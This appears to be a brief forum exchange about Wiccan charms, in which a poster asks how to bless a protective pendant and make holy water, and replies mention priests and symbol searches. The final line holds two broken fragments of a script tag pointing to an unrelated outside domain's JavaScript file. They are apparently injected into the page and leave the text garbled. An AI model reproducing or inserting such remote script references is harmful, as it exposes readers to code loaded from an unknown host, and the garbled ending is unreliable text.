Wiccan Charms..?

I don't know a much better word than "charm". I would like bless, purify, and charm a pendant for a loved one as a gift, but I would like the charm to help protect them as they wear it. Also, I have limited supplies. I would also like to make holy water and have heard it takes three pinches of salt as a part to make it. Any comments/suggestions? I believe that only a priest or priestess can make holy water and affectively use it. Many symbols can be found by searching Wiccan symbols and looking under images. There's a lot of photos that have the symbol and description under them. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
